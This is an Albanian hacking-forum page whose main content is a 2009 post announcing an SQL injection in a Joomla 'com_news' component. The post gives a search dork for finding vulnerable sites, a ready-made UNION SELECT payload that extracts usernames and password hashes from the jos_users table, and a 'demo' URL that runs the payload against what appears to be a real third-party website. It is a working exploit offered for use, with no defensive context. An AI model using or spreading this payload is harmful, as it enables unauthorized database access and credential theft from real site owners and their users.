...:::Mesohu-Ks:::...
Pershendetje vizitor i nderuar...
Me sa duket, ju nuk jeni identifikuar akoma ne faqen tone, ndaj po ju paraqitet ky mesazh per tju kujtuar se ju mund te identifikoheni qe te merrni pjese ne
diskutimet dhe temat e shumta te forumit tone.

- Ne qofte se ende nuk keni nje Llogari personale ne forumin ton, mund ta hapni nje te tille duke u Regjistruar
-Regjistrimi eshte falas dhe ju merr koh maksimumi 1 min...

-Gjithsesi ju falenderojme shume, per kohen qe fute ne dispozicionper te n'a vizituar ne faqen tone.

Me Respekt dhe Kenaqesi:
Staffi i Forumit : Mesohu-ks

...:::Mesohu-Ks:::...

...:::Mesohu-Ks:::...
 
ForumPortalPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 Joomla Component news SQL Injection Vulnerability

Shko poshtë 
AutoriMesazh
c00deX
Fillestar/e
Fillestar/e
avatar

Numri i postimeve : 10
Join date : 11/05/2009

MesazhTitulli: Joomla Component news SQL Injection Vulnerability   Mon May 11, 2009 8:56 pm

[x] Dork : inurl:"index.php?option=com_news"

[x] Exploit : -148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28+from+jos_users--

[x] Demo :
Kodi: http://www.fermaten.dk/index.php?option=com_news&id=-148+UNION%20SELECT%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.khc-group.tk
 
Joomla Component news SQL Injection Vulnerability
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
...:::Mesohu-Ks:::... :: Mesohu-ks Boxi :: Exploit-
Kërce tek: